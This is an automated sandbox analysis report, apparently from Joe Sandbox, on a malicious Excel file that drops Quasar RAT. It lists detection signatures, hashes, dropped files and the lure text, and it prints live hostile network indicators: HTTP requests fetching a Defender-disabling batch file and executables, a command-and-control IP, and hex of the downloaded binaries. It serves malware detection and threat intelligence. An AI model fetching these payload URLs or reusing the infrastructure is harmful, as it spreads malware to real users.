Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name: spetsifikatsiya.xls
Analysis ID: 336545
MD5: 2e0819723d50d0b6a2e6ffdb33778e40
SHA1: 329d002fc53f93e92b99dfbc5937412b40fccf93
SHA256: 04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
Tags: SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Yara detected Quasar RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide a thread from the debugger
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Obfuscated command line found
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: spetsifikatsiya.xls Virustotal: Detection: 13% Perma Link
Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JrekdQ.exe Joe Sandbox ML: detected
Source: sp.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 28_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C7F30 FindFirstFileW,GetLastError, 28_2_005C7F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 4x nop then jmp 01F65B55h 31_2_01F65AE0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 4x nop then jmp 01F65B55h 31_2_01F65AD0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5C25
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5AE0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5AD0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 185.157.162.81 ports 1,3,1973,1972,7,9
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:57:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 06 Jan 2021 00:13:34 GMTETag: "53b13c0-42e600-5b83031a39cfd"Accept-Ranges: bytesContent-Length: 4384256Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 74 eb 03 00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: SUPERHOSTING_ASBG SUPERHOSTING_ASBG
Source: Joe Sandbox View ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00415B0A WSARecv, 28_2_00415B0A
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piri
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: sp.exe String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Installs a global mouse hook
Source: C:\Users\user\AppData\Roaming\sp.exe Windows user hook set: 0 mouse low level NULL Jump to behavior

E-Banking Fraud:

barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
Source: Document image extraction number: 1 Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk
